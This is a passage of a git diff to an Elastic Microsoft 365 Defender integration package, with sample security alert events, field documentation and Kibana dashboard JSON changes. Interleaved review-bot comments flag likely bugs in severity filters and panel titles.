Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"parentProcessCreationDateTime\":\"2021-08-12T07:39:09.0909239Z\",\"parentProcessId\":668,\"parentProcessImageFile\":{\"fileName\":\"services.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft 
Corporation\",\"fileSize\":731744,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"\\\"MsSense.exe\\\"\",\"processCreationDateTime\":\"2021-08-12T12:43:19.0772577Z\",\"processId\":4780,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"SYSTEM\",\"azureAdUserId\":null,\"domainName\":\"NT AUTHORITY\",\"userPrincipalName\":null,\"userSid\":\"S-1-5-18\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.registryKeyEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"registryHive\":\"HKEY_LOCAL_MACHINE\",\"registryKey\":\"SYSTEM\\\\CONTROLSET001\\\\CONTROL\\\\WMI\\\\AUTOLOGGER\\\\SENSEAUDITLOGGER\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2021-04-26T07:45:50.116Z\",\"id\":\"da637551227677560813_-961444813\",\"incidentId\":\"28282\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"lastActivityDateTime\":\"2021-05-02T07:56:58.222Z\",\"lastUpdateDateTime\":\"2021-05-02T14:19:01.3266667Z\",\"mitreTechniques\":[\"T1564.001\"],\"providerAlertId\":\"da637551227677560813_-961444813\",\"recommendedActions\":\"Collect artifacts and determine scope\\n�\\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \\n�\\tLook for the presence of relevant artifacts on other systems. 
Identify commonalities and differences between potentially compromised systems.\\n�\\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\\n�\\tSubmit undetected files to the MMPC malware portal\\n\\nInitiate containment \\u0026 mitigation \\n�\\tContact the user to verify intent and initiate local remediation actions as needed.\\n�\\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\\n�\\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\\n�\\tIf credential theft is suspected, reset all relevant users passwords.\\n�\\tBlock communication with relevant URLs or IPs at the organization�s perimeter.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"low\",\"status\":\"new\",\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious execution of hidden file\"},\"assignedTo\":\"KaiC@contoso.onmicrosoft.com\",\"classification\":\"truePositive\",\"comments\":[{\"comment\":\"Demo incident\",\"createdBy\":\"DavidS@contoso.onmicrosoft.com\",\"createdTime\":\"2021-09-30T12:07:37.2756993Z\"}],\"createdDateTime\":\"2021-08-13T08:43:35.5533333Z\",\"determination\":\"multiStagedAttack\",\"displayName\":\"Multi-stage incident involving Initial access \\u0026 Command and control on multiple endpoints reported by multiple sources\",\"id\":\"2972395\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47\",\"lastUpdateDateTime\":\"2021-09-30T09:35:45.1133333Z\",\"redirectIncidentId\":null,\"severity\":\"medium\",\"status\":\"active\",\"tags\":[\"Demo\"],\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\"}", "provider": "microsoftDefenderForEndpoint", 
@@ -874,7 +1357,6 @@ An example event for `incident` looks as following:
 }
 }
 }
-
 ```
 **Exported fields**
@@ -1011,6 +1493,7 @@ An example event for `incident` looks as following:
 | m365_defender.incident.alert.evidence.network_message_id | Unique identifier for the email, generated by Microsoft 365. | keyword |
 | m365_defender.incident.alert.evidence.network_message_ids | Unique identifiers for the emails in the cluster, generated by Microsoft 365. | keyword |
 | m365_defender.incident.alert.evidence.object_id | The unique identifier of the application object in Azure AD. | keyword |
+| m365_defender.incident.alert.evidence.odata_type | | keyword |
 | m365_defender.incident.alert.evidence.onboarding_status | The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue. | keyword |
 | m365_defender.incident.alert.evidence.os_build | The build version for the operating system the device is running. | keyword |
 | m365_defender.incident.alert.evidence.os_platform | The operating system platform the device is running. | keyword |
@@ -1066,6 +1549,7 @@ An example event for `incident` looks as following:
 | m365_defender.incident.alert.evidence.urn | Uniform resource name (URN) of the automated investigation where the cluster was identified. | keyword |
 | m365_defender.incident.alert.evidence.user_account.account_name | The user account's displayed name. | keyword |
 | m365_defender.incident.alert.evidence.user_account.azure_ad_user_id | The user object identifier in Azure AD. | keyword |
+| m365_defender.incident.alert.evidence.user_account.display_name | The user display name in Azure AD. | keyword |
 | m365_defender.incident.alert.evidence.user_account.domain_name | The name of the Active Directory domain of which the user is a member. | keyword |
 | m365_defender.incident.alert.evidence.user_account.odata_type | | keyword |
 | m365_defender.incident.alert.evidence.user_account.user_principal_name | The user principal name of the account in Azure AD. | keyword |
@@ -1176,11 +1660,11 @@ An example event for `log` looks as following:
 {
 "@timestamp": "2020-09-06T12:07:55.32Z",
 "agent": {
- "ephemeral_id": "538b61a2-ee8e-4f0f-92b3-874bb25bd07c",
- "id": "761cded5-abcb-4ec8-a5e6-f7546489e271",
+ "ephemeral_id": "75fd76e4-ea58-4f89-92b4-6d1acb0a10bb",
+ "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.7.1"
+ "version": "8.13.0"
 },
 "cloud": {
 "provider": "azure"
@@ -1194,9 +1678,9 @@ An example event for `log` looks as following:
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "761cded5-abcb-4ec8-a5e6-f7546489e271",
- "snapshot": false,
- "version": "8.7.1"
+ "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1",
+ "snapshot": true,
+ "version": "8.13.0"
 },
 "event": {
 "action": "InitialAccess",
@@ -1209,7 +1693,7 @@ An example event for `log` looks as following: "duration": 0, "end": "2020-09-06T12:04:00Z", "id": "faf8edc936-85f8-a603-b800-08d8525cf099", - "ingested": "2023-08-08T07:59:58Z", + "ingested": "2024-01-17T16:06:28Z", "kind": "alert", "original": "{\"alerts\":{\"actorName\":null,\"alertId\":\"faf8edc936-85f8-a603-b800-08d8525cf099\",\"assignedTo\":\"Automation\",\"category\":\"InitialAccess\",\"classification\":null,\"creationTime\":\"2020-09-06T12:07:54.3716642Z\",\"description\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2\",\"detectionSource\":\"OfficeATP\",\"determination\":null,\"devices\":[],\"entities\":{\"aadUserId\":null,\"accountName\":null,\"clusterBy\":null,\"deliveryAction\":null,\"deviceId\":null,\"domainName\":null,\"entityType\":\"MailBox\",\"fileName\":null,\"filePath\":null,\"ipAddress\":null,\"mailboxAddress\":\"testUser3@contoso.com\",\"mailboxDisplayName\":\"test User3\",\"parentProcessCreationTime\":null,\"parentProcessId\":null,\"processCommandLine\":null,\"processCreationTime\":null,\"processId\":null,\"recipient\":null,\"registryHive\":null,\"registryKey\":null,\"registryValue\":null,\"registryValueType\":null,\"securityGroupId\":null,\"securityGroupName\":null,\"sender\":null,\"sha1\":null,\"sha256\":null,\"subject\":null,\"url\":null,\"userPrincipalName\":\"testUser3@contoso.com\",\"userSid\":null},\"firstActivity\":\"2020-09-06T12:04:00Z\",\"incidentId\":924518,\"investigationId\":null,\"investigationState\":\"Queued\",\"lastActivity\":\"2020-09-06T12:04:00Z\",\"lastUpdatedTime\":\"2020-09-06T12:37:40.88Z\",\"mitreTechniques\":[],\"resolvedTime\":null,\"serviceSource\":\"OfficeATP\",\"severity\":\"Informational\",\"status\":\"InProgress\",\"threatFamilyName\":null,\"title\":\"Email reported by user as malware or 
phish\"},\"assignedTo\":null,\"classification\":\"Unknown\",\"comments\":[],\"createdTime\":\"2020-09-06T12:07:55.1366667Z\",\"determination\":\"NotAvailable\",\"incidentId\":924518,\"incidentName\":\"Email reported by user as malware or phish\",\"lastUpdateTime\":\"2020-09-06T12:07:55.32Z\",\"redirectIncidentId\":null,\"severity\":\"Informational\",\"status\":\"Active\",\"tags\":[]}", "provider": "OfficeATP", @@ -1282,7 +1766,6 @@ An example event for `log` looks as following: "name": "testUser3@contoso.com" } } - ``` **Exported fields** diff --git a/packages/m365_defender/img/m365-defender-alert.png b/packages/m365_defender/img/m365-defender-alert.png new file mode 100644 index 00000000000..308c6b77446 Binary files /dev/null and b/packages/m365_defender/img/m365-defender-alert.png differ diff --git a/packages/m365_defender/img/m365-defender-incident-alert1.png b/packages/m365_defender/img/m365-defender-incident-alert1.png deleted file mode 100644 index ffde9911c29..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incident-alert1.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incident-alert2.png b/packages/m365_defender/img/m365-defender-incident-alert2.png deleted file mode 100644 index 27ab38cc080..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incident-alert2.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incidents-incidents1.png b/packages/m365_defender/img/m365-defender-incidents-incidents1.png deleted file mode 100644 index 66b45cc077e..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incidents-incidents1.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incidents-incidents2.png b/packages/m365_defender/img/m365-defender-incidents-incidents2.png deleted file mode 100644 index 322d1f5a866..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incidents-incidents2.png and /dev/null differ 
diff --git a/packages/m365_defender/img/m365-defender-incidents.png b/packages/m365_defender/img/m365-defender-incidents.png new file mode 100644 index 00000000000..2ba96e46803 Binary files /dev/null and b/packages/m365_defender/img/m365-defender-incidents.png differ diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json b/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json index 6c97e5cd576..c9b0c72246e 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json 
@@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"d218fe98-720c-4475-b679-38ebec3e5ecb\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d218fe98-720c-4475-b679-38ebec3e5ecb\",\"fieldName\":\"m365_defender.event.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}},\"0a666826-2535-479f-bfc7-55f386ebc9fc\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0a666826-2535-479f-bfc7-55f386ebc9fc\",\"fieldName\":\"user.name\",\"title\":\"Username\",\"enhancements\":{}}},\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\",\"fieldName\":\"m365_defender.event.alert.category\",\"title\":\"Alert Category\",\"enhancements\":{}}}}" + "panelsJSON": 
"{\"d218fe98-720c-4475-b679-38ebec3e5ecb\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d218fe98-720c-4475-b679-38ebec3e5ecb\",\"fieldName\":\"event.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}},\"0a666826-2535-479f-bfc7-55f386ebc9fc\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0a666826-2535-479f-bfc7-55f386ebc9fc\",\"fieldName\":\"user.name\",\"title\":\"Username\",\"enhancements\":{}}},\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\",\"fieldName\":\"m365_defender.event.alert.category\",\"title\":\"Alert Category\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Alert Events.", "kibanaSavedObjectMeta": { @@ -193,9 +193,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "high" @@ -204,7 +204,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "high" + "event.severity": "high" } } } @@ -410,9 +410,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "medium" @@ -421,7 +421,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "medium" + "event.severity": "medium" } } } 
@@ -627,9 +627,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "low" @@ -638,7 +638,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "low" + "event.severity": "low" } } } @@ -844,9 +844,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "informational" @@ -855,7 +855,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "informational" + "event.severity": "informational" } } } @@ -1114,7 +1114,7 @@ "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.event.severity" + "sourceField": "event.severity" }, "5772c4ea-7b5d-462a-badf-898f36d749e7": { "customLabel": true, diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json index 8677d09a45f..f9a2c14a6f8 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json 
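Review bot: The severity filters rewritten in the `@@ -855,7 +855,7 @@` hunk (and its sibling `-204`, `-421` and `-638` hunks) now run `match_phrase` on `event.severity` with the string values `"high"`, `"medium"`, `"low"` and `"informational"`, while the incident dashboard later in this same diff switches `event.severity` to `"dataType": "number"` and a range-slider control, which suggests the field is the numeric ECS `event.severity` rather than the keyword `m365_defender.event.severity` it replaces. If the `m365_defender.event` data stream maps it the same way, a phrase query for `"high"` against a numeric field will match nothing or fail to parse, and the four filtered panels will render empty. Before merging, confirm the mapping of `event.severity` for that data stream; if it is numeric, replace each `"match_phrase": { "event.severity": "high" }` with a `range` filter on the numeric value the ingest pipeline assigns, or keep the filters on the keyword field. The `"sourceField": "event.severity"` change in the `-1114` hunk has the same dependency, since that column is `"scale": "ordinal"` and its `dataType` is not visible here.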
@@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\",\"fieldName\":\"m365_defender.incident.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"4f83317b-ba18-4a9a-b682-b822f79ee030\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4f83317b-ba18-4a9a-b682-b822f79ee030\",\"fieldName\":\"m365_defender.incident.status\",\"title\":\"Incident Status\",\"enhancements\":{}}},\"7aef0b74-b368-4a23-a713-02f3fcc672fc\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7aef0b74-b368-4a23-a713-02f3fcc672fc\",\"fieldName\":\"source.user.name\",\"title\":\"Source Username\",\"enhancements\":{}}},\"d4d6a591-6a26-412e-b0bd-9f71329143ba\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d4d6a591-6a26-412e-b0bd-9f71329143ba\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}}}" + "panelsJSON": "{\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\":{\"type\":\"rangeSliderControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"fieldName\":\"event.severity\",\"value\":[\"\",\"\"],\"id\":\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\",\"enhancements\":{}}},\"4f83317b-ba18-4a9a-b682-b822f79ee030\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4f83317b-ba18-4a9a-b682-b822f79ee030\",\"fieldName\":\"m365_defender.incident.status\",\"title\":\"Incident 
Status\",\"enhancements\":{}}},\"7aef0b74-b368-4a23-a713-02f3fcc672fc\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7aef0b74-b368-4a23-a713-02f3fcc672fc\",\"fieldName\":\"source.user.name\",\"title\":\"Source Username\",\"enhancements\":{}}},\"d4d6a591-6a26-412e-b0bd-9f71329143ba\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d4d6a591-6a26-412e-b0bd-9f71329143ba\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Incidents", "kibanaSavedObjectMeta": { 
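Review bot: The new `rangeSliderControl` in the rewritten `panelsJSON` line drops the `\"title\":\"Severity\"` that the previous `optionsListControl` carried in its `explicitInput`, so the control will presumably fall back to the raw field name `event.severity` next to the labelled `Hostname`, `Source Username` and `Incident Status` controls. Restore the label: `\"explicitInput\":{\"fieldName\":\"event.severity\",\"title\":\"Severity\",\"value\":[\"\",\"\"],\"id\":\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\",\"enhancements\":{}}`. The default `\"value\":[\"\",\"\"]` is also worth checking against the Kibana version the panels declare (`8.7.1`) to confirm it is treated as an unset range rather than a filter on empty strings.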
@@ -43,7 +43,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Incident Datastream (Graph API) \n\n**[Incidents](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06)** \n[Alerts](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03) \n\n#### Description\n\nThis dashboard visualizes Incident type events collected from the MS Graph API using the Incident Datastream\n\n", + "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Graph API Datastream\n**[Incidents](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06)** \n[Alerts](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03) \n\n#### Description\n\nThis dashboard visualizes Incident and Alert type events collected from the MS Graph API using the Incident Datastream\n\n", "openLinksInNewTab": false }, "title": "", 
@@ -249,6 +249,205 @@ "type": "lens", "version": "8.7.1" }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e": { + "columnOrder": [ + "330da6b3-a0e3-41b9-8103-69b3381f1788", + "6400adfe-4702-4f13-923f-f94d87aa0ced", + "6400adfe-4702-4f13-923f-f94d87aa0cedX0", + "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + ], + "columns": { + "330da6b3-a0e3-41b9-8103-69b3381f1788": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Total Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"new\" " + }, + "label": "New Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"inProgress\" " + }, + "label": "In Progress Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"resolved\" " + }, + "label": "Resolved Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.severity : \"high\"" + }, + "label": "High Severity Alerts" + }, + { + "input": { + "language": "kuery", + "query": "not (m365_defender.incident.alert.assigned_to : * )" + }, + "label": "Unassigned Alerts" + } + ] + }, + "scale": "ordinal" + }, + "6400adfe-4702-4f13-923f-f94d87aa0ced": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "formula", + "params": { + "formula": "defaults(unique_count(m365_defender.incident.alert.id), 0)", + "isFormulaBroken": 
false + }, + "references": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + ], + "scale": "ratio" + }, + "6400adfe-4702-4f13-923f-f94d87aa0cedX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Count", + "operationType": "unique_count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "6400adfe-4702-4f13-923f-f94d87aa0cedX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Count", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX0", + 0 + ], + "location": { + "max": 58, + "min": 0 + }, + "name": "defaults", + "text": "defaults(unique_count(m365_defender.incident.alert.id), 0)", + "type": "function" + } + }, + "references": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "330da6b3-a0e3-41b9-8103-69b3381f1788", + "color": "#6092C0", + "layerId": "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "layerType": "data", + "metricAccessor": "6400adfe-4702-4f13-923f-f94d87aa0ced" + } + }, + "title": "Alert Counts [Logs Microsoft 365 Defender] (converted)", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": 
"4b49a572-a243-4c87-bea9-d0531d9dbd5a", + "w": 40, + "x": 8, + "y": 8 + }, + "panelIndex": "4b49a572-a243-4c87-bea9-d0531d9dbd5a", + "title": "Alert Counts [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, { "embeddableConfig": { "attributes": { @@ -260,7 +459,7 @@ }, { "id": "logs-*", - "name": "ce3e96ee-3a9d-477a-ac37-db9a950d836d", + "name": "c2e6011b-e248-4de4-8701-18029063d0ce", "type": "index-pattern" } ], @@ -277,7 +476,7 @@ "columns": { "330afb86-6197-4204-b9d3-49fb9d878111": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -289,10 +488,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.severity" + "sourceField": "event.severity" }, "8e73def1-b551-4bc3-9676-6bfe825f308f": { "customLabel": true, @@ -318,7 +521,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "ce3e96ee-3a9d-477a-ac37-db9a950d836d", + "index": "c2e6011b-e248-4de4-8701-18029063d0ce", "key": "data_stream.dataset", "negate": false, "params": { @@ -371,7 +574,7 @@ "i": "09a42be0-f530-4662-a284-5ad7d3264935", "w": 16, "x": 8, - "y": 8 + "y": 22 }, "panelIndex": "09a42be0-f530-4662-a284-5ad7d3264935", "title": "Distribution of Incidents by Severity [Logs Microsoft 365 Defender]", @@ -389,7 +592,7 @@ }, { "id": "logs-*", - "name": "b5cb2c9c-2731-4f8b-8001-4c674d131b67", + "name": "20ea0ba5-f3a2-45a8-8af1-00ccb757801f", "type": "index-pattern" } ], @@ -420,7 +623,7 @@ }, "d7cb197f-5b47-4ac1-a0c4-587c7b267a98": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", 
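Review bot: The inner Lens attributes of the new panel carry the title `"Alert Counts [Logs Microsoft 365 Defender] (converted)"`, which looks like a leftover from an automated legacy-visualization conversion, while the panel-level `"title"` a few lines below is `"Alert Counts [Logs Microsoft 365 Defender]"`. With `"hidePanelTitles": false` the panel-level title is the one shown, so the suffix is not user-visible, but it is noise that will resurface whenever the panel is cloned or exported; change the inner line to `"title": "Alert Counts [Logs Microsoft 365 Defender]",`. The six KQL filters and the `defaults(unique_count(m365_defender.incident.alert.id), 0)` formula read correctly against the field names documented elsewhere in this diff.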
